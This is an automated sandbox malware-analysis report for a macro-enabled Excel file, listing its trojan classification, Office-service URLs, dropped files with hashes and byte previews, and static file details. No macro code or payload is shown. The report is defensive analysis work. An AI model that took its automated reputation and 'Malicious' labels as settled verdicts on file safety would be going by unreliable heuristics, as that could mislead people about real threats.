                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://contentstorage.omex.office.net/addinclassifier/officeentities3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://augloop.office.com/v23004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://skyapi.live.net/Activity/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/mac3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://dataservice.o365filtering.com3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://api.cortana.ai3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://onedrive.live.com3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://ovisualuiapp.azurewebsites.net/pbiagave/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://visio.uservoice.com/forums/368202-visio-on-devices3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://directory.services.3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://login.windows-ppe.net/common/oauth2/authorize3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                                                      high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      No contacted IP infos

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                      Analysis ID:343115
                                                                                                                                                      Start date:22.01.2021
                                                                                                                                                      Start time:11:17:48
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 4m 55s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Sample file name:Refusal-1605078281-01212021.xlsm
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:26
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal80.troj.expl.evad.winXLSM@3/10@2/0
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xlsm
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 104.43.139.144, 13.88.21.125, 52.109.76.68, 52.109.8.25, 52.109.8.22, 40.88.32.150, 23.210.248.85, 51.104.139.180, 92.122.213.194, 92.122.213.247, 2.20.142.209, 2.20.142.210, 20.54.26.129, 51.104.144.132
                                                                                                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      No context

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      No context

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\3004DB52-1097-432F-8F3D-E32CBC0917F7
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):132942
                                                                                                                                                      Entropy (8bit):5.372902390435943
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:mcQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:orQ9DQW+zBX8P
                                                                                                                                                      MD5:9217B8A4196E8FE4967D067FB7F18DEE
                                                                                                                                                      SHA1:EE2A9FA7D8691D3E4E7380EAC6CBE5CCC2720D70
                                                                                                                                                      SHA-256:D4B3342F27110F414ADD63DBB7D7B4CD19A485D8DD2AC10FC1F45FEC58FF2E02
                                                                                                                                                      SHA-512:8176BA249652E9BBA8CF6A470397872BA023CFA1F3F4D824E1708FA23E77C4805A59A83957AF8088B30CCEC50BFAB388B7B8F4A7A1439D9C4378F00561F46BC1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-22T10:18:56">.. Build: 16.0.13720.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\2B0F7EF2.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):848
                                                                                                                                                      Entropy (8bit):7.595467031611744
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                      MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                      SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                      SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                      SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                      Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A76F8775.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):557
                                                                                                                                                      Entropy (8bit):7.343009301479381
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                      MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                      SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                                                      SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                      SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                      Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCE31C44.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8301
                                                                                                                                                      Entropy (8bit):7.970711494690041
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                                                                                      MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                                                                                      SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                                                                                      SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                                                                                      SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                      Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\95C10000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):25980
                                                                                                                                                      Entropy (8bit):7.555827267280556
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:p8x/WsCYCLW4/Wj48aoVT0QNuzWKPqGn8bEfYa:OEs54MnW+u7qkZYa
                                                                                                                                                      MD5:7CD20AF0DF9CD81DE4B82933450687ED
                                                                                                                                                      SHA1:1B4E7BBDC43A94E30DAB157606C1016157EECB47
                                                                                                                                                      SHA-256:AD24509748030F4173F1123AF9A4D5EDF3FB3305B591CD6E87EE82CFB6E98449
                                                                                                                                                      SHA-512:D50F39FB63CD276040FCCBFD9552AE9E2DD4D3EC8668628886D5B6810A51FAAD3F09B1ADCF9E72BFA9025A16C4C11F6B160F63B2539371F3CF6AEFB928EA9A59
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .U.n.0....?..........C....I?`L.%...a...;.....+........pz.r.z.D&.V\4.Q.WA.....m.MT..k..c+.H.j....q..*...>..]JR=:.&D.<...A.....j......T.g....C.?p.O6W7+..(../...w.....5.2...^.!..ba...C7.....1;..d.1=`.l.....}.......Hh.8.......Po"}..a(3..........R...i../!-.!,.. %LG5...fH.q.R..0..s`....LC%..v........W...#:.....y.S}....d7.vC9\OO|..1Nym...v.:..CB..y#wg..7.....H...s....*...x..w.........w......R]G.......c...c,.F..[....7.......PK..........!.................[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Fri Jan 22 18:18:58 2021, atime=Fri Jan 22 18:18:58 2021, length=12288, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):904
                                                                                                                                                      Entropy (8bit):4.646634171294751
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:8Ba9KXUvuElPCH2F56OYUDHe+WrjAZ/2bDPLC5Lu4t2Y+xIBjKZm:8Bal56fAZiDO87aB6m
                                                                                                                                                      MD5:95C4B25C07AC07BB845C53B494EDE67A
                                                                                                                                                      SHA1:15CDDF11B239D0E7B1A007E4F00BE3697F092C47
                                                                                                                                                      SHA-256:53FE03867FC42B5F405E635BA840BF22B58626C6707B3ECAED473A96B68A7D4B
                                                                                                                                                      SHA-512:CBDF54B53A9026D89563AD51A4CFFC6909E27D698004420445248CE5806ED38CCEB967B76E731F65E0BA37377CF1F8A4AC70378217CC3C578DC5FA369E147F3D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F........N....-..{..o....$n.o.....0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..6RQ.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|x..user.<.......Ny.6RQ......S....................b}@.h.a.r.d.z.....~.1.....6R`...Desktop.h.......Ny.6R`......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......216041...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Refusal-1605078281-01212021.xlsm.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:53 2020, mtime=Fri Jan 22 18:18:58 2021, atime=Fri Jan 22 18:18:58 2021, length=25980, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2290
                                                                                                                                                      Entropy (8bit):4.63637302325524
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8ha567AdiZAUXpVDUC7aB6myha567AdiZAUXpVDUC7aB6m:8HAiaU5CTB6pHAiaU5CTB6
                                                                                                                                                      MD5:1305CF83817914C893A027C5F5E728F8
                                                                                                                                                      SHA1:9FDB9030A3C25372C0DA33733519F52529F85EA7
                                                                                                                                                      SHA-256:9FCC4640B474FCCC76D671E988BE534728F7C692DA0D1C64F0202E149AB5AE8F
                                                                                                                                                      SHA-512:A9920676ED17D1929CE7ECF2CB61AACD10F91F72B29A5879417CF35D1A55539E69540444CDC179206D0BE224DFA9736CEE733A7E4BD628D611E07A3CED2C6A72
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F.... ...&a..:...;..o.....2.o....|e...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..6RQ.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|x..user.<.......Ny.6RQ......S....................b}@.h.a.r.d.z.....~.1.....>Q}x..Desktop.h.......Ny.6RQ......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.-f..6RY. .REFUSA~1.XLS..r......>Q{x6RY.....h.........................R.e.f.u.s.a.l.-.1.6.0.5.0.7.8.2.8.1.-.0.1.2.1.2.0.2.1...x.l.s.m.......f...............-.......e...........>.S......C:\Users\user\Desktop\Refusal-1605078281-01212021.xlsm..7.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.e.f.u.s.a.l.-.1.6.0.5.0.7.8.2.8.1.-.0.1.2.1.2.0.2.1...x.l.s.m.........:..,.LB.)...As...`.......X.......216041...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):151
                                                                                                                                                      Entropy (8bit):4.662236964996969
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:oyBVomxW8ADB/eRVOUcpSvi/eRVOUcpSmxW8ADB/eRVOUcpSv:dj4KVgpGzVgpGKVgpc
                                                                                                                                                      MD5:8B0B25D7B4A074B3980762CB6B8233E7
                                                                                                                                                      SHA1:F7042F4384DA013B1A12C91349B4142F770AEFD4
                                                                                                                                                      SHA-256:4B4855BBA82BD3048893A4CA01AEA150B32836123983E6B4BDB4B022D3889B39
                                                                                                                                                      SHA-512:4AEEEB2031279419E4335C20BD08766A36AC204C109FC2F568E8509A1D859CDBD754699DE11C66D20F20B1F561B349588FDCD2577C2903D77A691C8D667D6FB9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: Desktop.LNK=0..[misc]..Refusal-1605078281-01212021.xlsm.LNK=0..Refusal-1605078281-01212021.xlsm.LNK=0..[misc]..Refusal-1605078281-01212021.xlsm.LNK=0..
                                                                                                                                                      C:\Users\user\Desktop\76C10000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):25980
                                                                                                                                                      Entropy (8bit):7.555827267280556
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:p8x/WsCYCLW4/Wj48aoVT0QNuzWKPqGn8bEfYa:OEs54MnW+u7qkZYa
                                                                                                                                                      MD5:7CD20AF0DF9CD81DE4B82933450687ED
                                                                                                                                                      SHA1:1B4E7BBDC43A94E30DAB157606C1016157EECB47
                                                                                                                                                      SHA-256:AD24509748030F4173F1123AF9A4D5EDF3FB3305B591CD6E87EE82CFB6E98449
                                                                                                                                                      SHA-512:D50F39FB63CD276040FCCBFD9552AE9E2DD4D3EC8668628886D5B6810A51FAAD3F09B1ADCF9E72BFA9025A16C4C11F6B160F63B2539371F3CF6AEFB928EA9A59
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .U.n.0....?..........C....I?`L.%...a...;.....+........pz.r.z.D&.V\4.Q.WA.....m.MT..k..c+.H.j....q..*...>..]JR=:.&D.<...A.....j......T.g....C.?p.O6W7+..(../...w.....5.2...^.!..ba...C7.....1;..d.1=`.l.....}.......Hh.8.......Po"}..a(3..........R...i../!-.!,.. %LG5...fH.q.R..0..s`....LC%..v........W...#:.....y.S}....d7.vC9\OO|..1Nym...v.:..CB..y#wg..7.....H...s....*...x..w.........w......R]G.......c...c,.F..[....7.......PK..........!.................[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\Desktop\~$Refusal-1605078281-01212021.xlsm
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):330
                                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                      MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                      SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                      SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                      SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                                                      Entropy (8bit):7.5580097325384505
                                                                                                                                                      TrID:
                                                                                                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                      • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                      File name:Refusal-1605078281-01212021.xlsm
                                                                                                                                                      File size:26157
                                                                                                                                                      MD5:6b11147a8eb468cb247d32f4be0f7469
                                                                                                                                                      SHA1:ff599ff7ed480bf2485e1b85aed7e8c6bbe7aeec
                                                                                                                                                      SHA256:2fc494967112688b5cf699386bbab79f9d23cc03527769adc932739a0be93094
                                                                                                                                                      SHA512:3329e39614e0f53ab79ac35f1da674bfc9cd01474a8bf873de6135c472513696081a52c12c009d4ee84ba3befb0f9d576367f736ffe9efc9ddce1209f1d1e05d
                                                                                                                                                      SSDEEP:384:Ayfowh92aGc2FE6xtCg5SV8m2ylTQ8aoVT0QNuzWKP8W2VoXwL:AyflhQaGc2F5h5S6f6TfW+u7D2V7L
                                                                                                                                                      File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74ecd0e2f696908c

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OpenXML
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "Refusal-1605078281-01212021.xlsm"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:
                                                                                                                                                      Application Name:
                                                                                                                                                      Encrypted Document:
                                                                                                                                                      Contains Word Document Stream:
                                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:

                                                                                                                                                      Macro 4.0 Code

